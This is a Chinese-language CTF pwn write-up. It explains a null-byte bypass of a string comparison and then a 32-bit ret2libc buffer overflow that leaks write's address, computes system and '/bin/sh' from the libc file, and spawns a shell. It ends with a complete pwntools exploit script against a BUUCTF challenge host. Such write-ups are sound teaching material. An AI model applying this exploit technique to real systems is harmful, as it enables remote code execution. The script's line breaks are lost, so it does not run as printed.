找了半天发现浏览器太小没有看见给的libc.so链接
首先是字符串的比较
read是读到'\n'停止,而strlen是到'/0'就停止
所以我们可以让第一个字符为'\x00'绕过字符串比较
然后就是把v5覆盖得大一点 好让后面的read有机会溢出
然后就是libc.so泄露
libc.so可以给我们提供一套函数的地址,并且在里面虽有函数的相对位置都是固定的。意思是如果我们知道了每一个函数的真实地址,我们可以根据给出的libc.so计算出其他函数的真实地址(实际上就是要得到system_addr)
这里选择泄露write_addr,之后计算出system_addr
同样libc.so里面会有'/bin/sh'这样的字符串,计算出真实地址拿出来用就是了
补充:因为对于传参的引用不会使用pop而是直接利用ebp指向,所以ret后面紧跟下一个要ret函数的地址(如果没有想要跳转的函数,用4个/8个字符填充之后才能跟传参) 这里第20行就是write_plt之后紧跟main_addr进行第二次溢出调用system
from pwn import *
io=remote('node3.buuoj.cn',28972) # io=process('./pwn') elf=ELF('./pwn') libc=ELF('./libc-2.23.so') system_libc=libc.symbols['system'] binsh_libc=libc.search('/bin/sh').next() write_libc=libc.symbols['write'] write_plt=elf.plt['write'] write_got=elf.got['write'] main_addr=0x8048825 payload='\x00'+'\xff'*10 io.sendline(payload) io.recvuntil("Correct\n") payload='a'*(0xe7+4)+p32(write_plt)+p32(main_addr) # ret1 ret2 payload+=p32(1)+p32(write_got)+p32(4) #write par1 par2 par3 io.sendline(payload) write_addr=u32(io.recv(4)) base=write_addr-write_libc system_addr=system_libc+base binsh_addr=binsh_libc+base payload='\x00'+'\xff'*10 io.sendline(payload) io.recvuntil("Correct\n") payload='a'*(0xe7+4)+p32(system_addr)+p32(main_addr) payload+=p32(binsh_addr) io.sendline(payload) io.interactive() # rdi, rsi, rdx, rcx, r8, r9